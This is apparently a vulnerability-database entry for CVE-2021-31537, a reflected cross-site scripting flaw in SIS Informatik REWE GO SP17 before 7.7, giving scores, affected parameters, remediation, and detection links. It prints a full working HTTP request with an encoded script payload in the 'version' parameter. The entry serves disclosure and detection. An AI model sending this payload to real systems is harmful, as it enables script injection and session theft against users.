🔙 목록으로 돌아가기

CVE-2021-31537: SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting

TitleSIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting
Authorgeeknik
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
RemediationTo remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages.
CVSS Score6.1
EPSS Score0.72054
CVE IDCVE-2021-31537
CWE IDCWE-79
Tags cve2021 cve xss seclists intrusive sisinformatik vuln

🔍 Vulnerability Description

SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).

🌐 HTTP Request

GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(38FKTAcr6xxz6SiYKKRs7lsHJhD)%3c%2fscript%3e&win=2707 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31537.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-31537.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A